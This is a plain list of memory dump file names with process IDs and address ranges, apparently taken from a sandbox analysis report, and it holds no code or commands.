memory/3976-54-0x0000000077931000-0x0000000077A51000-memory.dmp

memory/3976-55-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/4612-56-0x0000000001200000-0x0000000004020000-memory.dmp

memory/3976-58-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/4612-59-0x0000000077931000-0x0000000077A51000-memory.dmp

memory/4612-60-0x00000000779B8000-0x00000000779B9000-memory.dmp

memory/3976-61-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3976-71-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/4612-75-0x0000000000400000-0x00000000005E4000-memory.dmp

memory/3976-78-0x0000000074F10000-0x00000000756C0000-memory.dmp

memory/3976-79-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/2968-82-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp

memory/4612-83-0x0000000000400000-0x00000000005E4000-memory.dmp

memory/4612-87-0x0000000000400000-0x00000000005E4000-memory.dmp

memory/4612-88-0x0000000001200000-0x0000000004020000-memory.dmp